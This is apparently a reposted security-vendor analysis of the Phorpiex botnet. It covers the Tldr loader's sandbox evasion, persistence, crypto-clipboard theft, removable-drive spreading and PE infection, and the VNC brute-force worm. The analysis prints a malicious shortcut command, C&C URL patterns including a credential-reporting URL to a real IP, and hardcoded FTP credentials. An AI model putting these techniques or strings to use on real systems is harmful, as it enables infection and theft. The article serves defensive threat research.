Original link: https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/

The Phorpiex botnet currently consists of more than 1,000,000 infected Windows computers. In our previous publications, we wrote about the botnet architecture, its command and control infrastructure, and monetization methods:

Phorpiex Breakdown

In the Footsteps of a Sextortion Campaign

In this article, we outline the technical details for implementing this botnet’s malicious modules.

The core part of the Phorpiex botnet is a loader named Tldr. It is responsible for loading additional malicious modules and other malware to the infected computers. Each module is a separate Windows executable. Usually, Phorpiex modules are very small and simple. The malware configuration, that usually includes addresses of the C&C servers, crypto-currency wallets, and URLs to download malicious payloads, is hardcoded to the malware executables. If it’s necessary to update the configuration, the botnet operators just load a new module to the infected machines. In addition, the modules are updated frequently with minor changes. During 2019, we observed the following types of modules:

• Loader Phorpiex Tldr.
• VNC Worm Module.
• NetBIOS Worm Module.
• XMRig Silent Miner.
• Spam Module: Self-spreading and Sextortion
• Auxiliary modules (tiny geo-targeted loaders, and clean-up modules).

We should emphasize that 3 of these modules (Tldr, VNC Worm, and NetBIOS Worm) have functionality that allow the malware to spread itself. For example, Tldr has the functionality of a file-infecting virus and is able to infect other files; VNC Worm connects to VNC servers with weak passwords and tries to infect them by simulating user input. This explains why this botnet has such a high prevalence.

In this report, we describe two of the Phorpiex modules in detail:

• Loader Phorpiex Tldr.
• VNC Worm Module.

Phorpiex Tldr

Tldr (probably stands for “TrikLoader”) is one of the key parts in the Phorpiex botnet infrastructure.

​ Figure 1 – Phorpiex Tldr PDB filename

When we first discovered this malware, we could not identify it or understand its affiliation with the botnet. However, its binary code, mutex names, and sandbox evasion techniques are evidence that this malware was developed by the same group of cybercriminals as those behind the Phorpiex Trik IRC bot. Also, we found several intersections between the Trik and Tldr C&C servers.

We noticed a large number of Phorpiex Tldr versions, each with different functionality. Our focus is on features they have in common, paying special attention to new functions added in the latest version (from July 2019). As stated previously, the main purpose of Tldr malware is to download and execute other modules and malware to infected computers. However, this is not the only functionality. Tldr is also capable of self-spreading, as it can behave like a worm or a file-infecting virus and infect other software.

Figure 2 – Phorpiex Tldr timeline

Evasion techniques

Phorpiex Tldr uses simple sandbox evasion techniques. When started, it calls the GetModuleHandle() API function to check if one of the following modules is loaded in its process:

• SBIEDLL.DLL
• SBIEDLLX.DLL
• WPESPY.DLL
• DIR_WATCH.DLL
• API_LOG.DLL
• DIR_WATCH.DLL
• PSTOREC.DLL

Then, it enumerates the running processes and checks if the process filename is one of the following:

• VBOXSERVICE.EXE
• VBOXTRAY.EXE
• VMTOOLSD.EXE
• VMWARETRAY.EXE
• VMWAREUSER
• VMSRVC.EXE
• VMUSRVC.EXE
• PRL_TOOLS.EXE
• XENSERVICE.EXE

An older version of Tldr (TldrV3, May 2018), also checks these processes:Then, it enumerates the running processes and checks if the process filename is one of the following:

• python.exe
• pythonw.exe
• prl_cc.exe
• vboxservice.exe
• vboxcontrol.exe
• tpautoconnsvc.exe

Finally, Tldr calls the IsDebuggerPresent() API function to check if the malware is being debugged.

If at least one check doesn’t pass, Tldr stops execution.

Initialization

The initialization step is very similar to the one for the Phorpiex Trik.

To prevent running multiple instances of Phorpiex Tldr, it creates a mutex with a specific hardcoded name. Older versions used the mutex name containing the version number, for example, “TldrV3”. In the latest version, the mutex name is different for each campaign. Usually it consists of several digits, for example: “6486894”.

​ Figure 3 – Mutex names used by different versions of Tldr.

The next step is the same for all Phorpiex samples: deleting the “:Zone.Identifier” alternative data stream. This is performed to remove the trace that the origin of the file is an untrusted source.

In addition, the version from July 2019 (Tldr v5.0) acquires Debug privilege:

Figure 4 – Tldr acquiring debug privilege in the version from July 2019

Persistence

Tldr copies itself to the following folders:

• %windir%
• %userprofile%
• %systemdrive% (only version from July 2019)
• %temp%

For the Phorpiex Tldr V3, choosing the path and the filename is almost identical to the procedures used by Phorpiex Trik. Tldr creates a subfolder with a hardcoded name that starts with “T-“ (in Phorpiex Trik, names started with “M-“) under these paths. Then the malware copies its executable to the created folder under a hard-coded filename. For example:

C:\WINDOWS\T-9759504507674060850740\winsvc.exe

Unlike Phorpiex Tldr v3, the newer version sets up persistence only if its filename doesn’t contain the “sys” substring. Then, it uses a sub-folder name generated from random digits and a filename that starts with “sys” followed by 4 random letters:

Figure 5 – Generating the filename for setting up persistence

Therefore, a new filename looks like this:

C:\WINDOWS\2813528135\sysjekp.exe

Phorpiex Tldr sets the attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN, FILE_ATTRIBUTE_SYSTEM for both the created file and subfolder.

Then, the malware sets up registry autorun entries for each created copy under the following keys:

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
• HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

Tldr creates a new registry value with a hardcoded name. In the researched sample, this name is “Windows Operating System”:

Figure 6 – Phorpiex Tldr autorun registry value

In addition, it adds a firewall exception by creating a new value under the registry key:

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\

Figure 7 – Phorpiex Tldr firewall exception

Bypassing Windows Security

The version of Phorpiex Tldr from July 2019 (Tldr v5) disables Windows security features such as Windows Defender, Security notifications and System Restore by setting the following registry values:

Table 1 – Registry values modified by Tldr v5.

Older versions of Tldr disable AntiSpyware only.

Main functionality

For each malicious activity, Phorpiex Tldr creates a separate thread.

Crypto Clipper Thread

Almost all samples contain functionality for stealing crypto-currency. This is done by changing the address of a crypto-currency wallet in the clipboard of an infected system.

In the infinite loop, every 200 milliseconds, the malware queries the clipboard data by calling the API functions OpenClipboard(0) and GetClipboardData(CF_TEXT).

To determine if the clipboard contains a crypto-wallet address, Phorpiex Tldr performs several checks:

• The first character is one of these: 1, 3, q, 2, X, D, 0, L, 4, P, t, z, G, U, E;
• The clipboard length is between 25 and 45 characters, or 9 letters, or between 90 and 115 letters.
• Clipboard data should not contain letters: O (0x4F), I (0x49), l (0x6C)
• Clipboard data should contain only digits and letters

If any of the checks fail, the clipboard remains unchanged. Otherwise, it determines the type of a crypto-currency wallet address and changes it to one of the hardcoded values. Phorpiex Tldr determines the exact type of blockchain by the first character of the clipboard data:

Figure 8 – Crypto-currency wallets used by Phorpiex.

The following crypto-currencies are supported by Phorpiex:

• Bitcoin
• Bitcoin Cash
• Ethereum
• DASH
• Dogecoin
• Litecoin
• Monero
• Zcash

Crypto Clipper also handles Perfect Money wallets (Gold, USD, EUR):

Figure 9 – Perfect Money wallets used by Phorpiex.

Finally, the new data is sent back to the clipboard by calling SetClipboardData(CF_TEXT, new_value).

Self-spreading Thread

In this thread, the functionality of a file-worm is implemented.

In an infinite loop with a delay of 2 seconds, Tldr enumerates the available drives using GetLogicalDrives. It reads the “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” registry key value “NoDrives” and excludes the drives disabled by the NoDrives Windows Explorer policy from enumeration.

Then, Tldr selects only removable and remote drives. On each selected drive, it creates a folder with the name “__” and sets the attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN, and FILE_ATRRIBUTE_SYSTEM to the created folder to make it invisible in Explorer by default.

The malware copies itself to this folder under the hardcoded name (“DriveMgr.exe” in our sample). Tldr acquires the volume name of the selected drive. Then it creates a shortcut with the name “{volume_name}.lnk” in the root folder of the selected drive with the target:

%windir%\system32\cmd.exe /c start & \DriveMgr.exe & exit

Then Tldr moves all folders from the root path of the selected drive to the folder “__”. It also deletes all files in the root path with the following extensions:

.lnk, \.vbs, *.bat, *.js, *.scr, *.com, *.jse, *.cmd,*.pif, *.jar, *.dll, *.vbe, *.inf”

Figure 10 – Extensions of files deleted by Tldr on removable drives.

The reason for this may be to disable all other worms that reside on the same removable drive.

As we can see, the behavior is the same as for other worms that use removable drives for spreading.

However, in Tldr v5.0, a new functionality was introduced that allows the malware to function as a file-infecting virus and infect other executables. Earlier, Phorpiex used a separate module to infect other software.

The malware scans all folders on removable and remote drives and infects all .exe files that are still not infected.

To infect another PE file, Tldr performs the following modifications: It increments the number of sections in the PE file header, and sets the TimeDateStamp value of the header to the value 0x0000DEAD:

Figure 11 – Timestamp signature used by Tldr to mark the infected files

The value 0x0000DEAD in the TimeDateStamp is also used by the malware to detect if the file is already infected. The value 0x0000DEAD transforms into the timestamp 1970-01-01 15:50:05. Therefore, infected samples can be easily found on VirusTotal using this query:
pets:1970-01-01T15:50:05

Tldr also creates a new code section with the name “.zero” and copies the malicious payload there. The Entry Point address is modified to point to the beginning of the created section. The SizeOfImage value of the header is increased by the length of the added section. The malware doesn’t recalculate checksum; it is just reset to 0.

Figure 12 – Comparison of original and infected files

To create an adapter for calling the original entry point, the malware writes its relative address in the code of the main injected function:

Figure 13 – Comparison of the same function in the template and infected sample

Tldr uses the value 0xCCCCCCCC to find the location in the template function, where the original entry point address should be placed:

Figure 14 – Setting the address of entry point in an infected sample

Malicious Shellcode

The shellcode inserted into infected files consists of several functions with position-independent code. This means that functions don’t use absolute addresses and are able to function correctly when placed in any memory location.

First, the shellcode checks if the file “%appdata%\winsvcs.txt” exists. This file is created by the Phorpiex Tldr. If the file exists, the shellcode doesn’t perform any action and just passes control to the original Entry Point of the infection program. Otherwise, it downloads and executes another file from a hard-coded URL:

Figure 15 – Part of the shellcode in infected sample.

The file is downloaded to the temp file using the API function URLDownloadToFileW. The name for the temp file is obtained using the functions GetTempPathW and GetTempFileNameW. If the file was successfully downloaded, the shellcode deletes “:Zone.Identifier” ADS from this file and executes the file using CreateProcessW.

Finally, the control is passed to the original entry point of the infected program.

C&C Check-in Threads

When first run, Phorpiex Tldr performs check-in HTTP requests to its C&C servers, using a hardcoded list of C&C servers:

Figure 16 – Hardcoded URLs of Phorpiex C&C servers.

Tldr creates a thread for each C&C server. Before starting the threads, the malware creates an empty file “%appdata%\winsvcs.txt”. This file is used as a flag to determine if the malware is running for the first time. If this file already exists, the threads are not created.

In each thread, the malware queries the following URL:

http://<cnc_host>/t.php?new=1

We have also seen URLs of different formats in other samples. For example:

http://<cnc_host>/tldr.php?new=1

http://<cnc_host>/tldr.php?on=1

http://<cnc_host>/tldr.php?new=1&id=<random_number>

http://<cnc_host>/tldr.php?new=1&on=<random_number>

To perform check-in requests, Phorpiex Tldr uses a specific hard-coded value for User-agent header. The value for the version from July 2019 is:

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0

The value for older versions:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0

Therefore, the resulting HTTP request looks like the following:

Figure 17 – Phorpiex C&C check-in request.

The C&C check-in functionality is not mandatory and not present in all samples.

Main thread

The main purpose of Phorpiex Tldr is to download and execute additional malicious payloads on infected hosts. It uses several hardcoded paths (usually from 4 to 8) to create URLs for downloading files:

Figure 18 – Hardcoded paths accessed at the C&C server by Phorpiex Tldr.

The resulting URLs looks like this:

http://<cnc_domain>/1.exe

http://<cnc_domain>/2.exe

…

For each generated URL, the malware first checks its availability and content size by using the API functions InternetOpenUrlA and HttpQueryInfoA. If the URL is available, Tldr remembers the content size for each path. If the content size is the same as the previous value, the URL is skipped, thus preventing re-downloading the same payload.

If the URL is available and requested for the first time, or the content length differs from the previous value, Tldr downloads and executes it. The downloaded file is saved in the %temp% folder under the name:

“%d.exe” % random.randint(10000, 40000)

For example:

%temp%\23874.exe

Tldr performs 2 attempts to download a file: using InternetOpenUrlW/InternetReadFile, and using URLDownloadToFileW if the previous attempt failed.

After downloading the file, Phorpiex Tldr deletes its alternative data stream “:Zone.Identifier”. Then it performs 2 attempts to execute the downloaded file: using CreateProcess, and ShellExecute if the previous attempt failed.

The actions above are performed in an infinite loop with a random delay from 1 to 600 seconds between cycles.

It’s interesting to note that such an implementation of the loader is very unsafe; anyone who registers domains which are hardcoded in older versions of Phorpiex Tldr can upload and execute any software on infected hosts. However, the latest Tldr version (v5) received a significant improvement which makes such a scenario impossible.

The new feature uses file encryption with RC4 and RSA-SHA1 signature verification. The digital signature allows the malware to verify both the integrity and authenticity of downloaded samples.

The encrypted file has a header which contains the magic bytes (“NGS!”), the length of the RSA signature, and the RSA signature that is used for verifying the file. The first 16 bytes of the RSA signature are used as the RC4 decryption key:

Figure 19 – Format of the encrypted file downloaded from the Phorpiex C&C server.

Phorpiex Tldr decrypts the data using the 16-bytes RC4 key from the file, and then calculates the SHA1 hash of the decrypted file. To verify the digital signature, Tldr uses the 4096-bit RSA public key hardcoded into the sample.

Figure 20 – Hardcoded RSA public key.

If the signature verification fails, the file is not executed. This means that only files signed with the corresponding RSA private key can be accepted by the Phorpiex Tldr.

Phorpiex VNC Worm Module

One of the modules we discovered in the Phorpiex arsenal is a malicious VNC client. It doesn’t have its own persistence mechanism and is normally executed by Tldr each time. This tiny malware scans random IP addresses for an open VNC server port (5900) and runs a brute-force attack using a hard-coded list of passwords. The final goal of that attack is to load and execute another malware (usually Phorpiex Tldr) on the target host.

The execution of the Phorpiex VNC Worm starts with an API bombing sandbox evasion technique. It performs a large number of meaningless calls to several functions in a loop:

Figure 21 – API bombing evasion technique.

The malware prevents multiple executions in several instances by using a mutex with a hardcoded name:

The attack itself is performed in an infinite loop. The IP addresses used for scanning are generated randomly using the rand() function and the GetTickCount() results as a random seed. The only filter rule for an IP address is that it cannot start with 127, 172 or 192. A separate thread is created to communicate with each IP address.

If the attempt to connect to the TCP port 5900 was successful, the VNC worm starts a brute-force attack of the discovered VNC server with a list of passwords:

Figure 22 – List of passwords used for the VNC brute-force attack.

The list of passwords may vary among different samples.

If the attack is successful, the results can be reported to a C&C server using the URL of the following format (the URL template is hardcoded in the malware sample):

hxxp://92.63.197.153/result.php?vnc=%s|%s” % (host, password)

In the researched samples the reporting functionality is disabled even though the URL is present.

Finally, the Phorpiex VNC worm executes several scripts on a victim’s machine by simulating keyboard input using VNC protocol. First it enters Win+R to open the “Run program” window. Then it “enters” the script contents by sending the corresponding VNC packets:

Figure 23 – Illustration of the attack: simulated user input using VNC commands.

The following scripts are usually executed:

This way, the Phorpiex VNC worm forces the victim’s machine to download and execute a malicious sample through HTTP or FTP from the server which is controlled by the malware actors. As we can see from the script source, the malware uses hardcoded credentials to access the FTP server:

USER tom PASS hehehe

We observed the following locations that were used for the victims to download payloads:

This module was generally used by Phorpiex botnet for self-spreading and pushing ransomware.

IOC

Phorpiex Tldr

Phorpiex Tldr C&C IPs and domains:

URLs related to Phorpiex Tldr:

Phorpiex VNC Worm

Check Point Anti-Bot blade provides protection against this threat:
Worm.Win32.Phorpiex.C
Worm.Win32.Phorpiex.D
Worm.Win32.Phorpiex.H

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！